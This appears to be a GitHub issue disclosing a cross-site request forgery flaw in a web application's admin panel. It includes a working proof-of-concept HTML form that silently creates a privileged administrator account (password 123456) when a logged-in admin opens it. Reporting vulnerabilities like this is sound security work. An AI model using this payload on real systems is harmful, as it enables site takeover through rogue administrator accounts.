Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the administrator logged in, open the following page can add an administrator user named admin poc: test.html---add an administrator user named admin
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/admin.php?c=admin&f=save" method="POST"> <input type="hidden" name="account" value="admin" /> <input type="hidden" name="pass" value="123456" /> <input type="hidden" name="email" value="test@163.com" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="if_system" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
After the administrator logged in, open the following page can add an administrator user named admin
poc:
test.html---add an administrator user named admin
The text was updated successfully, but these errors were encountered: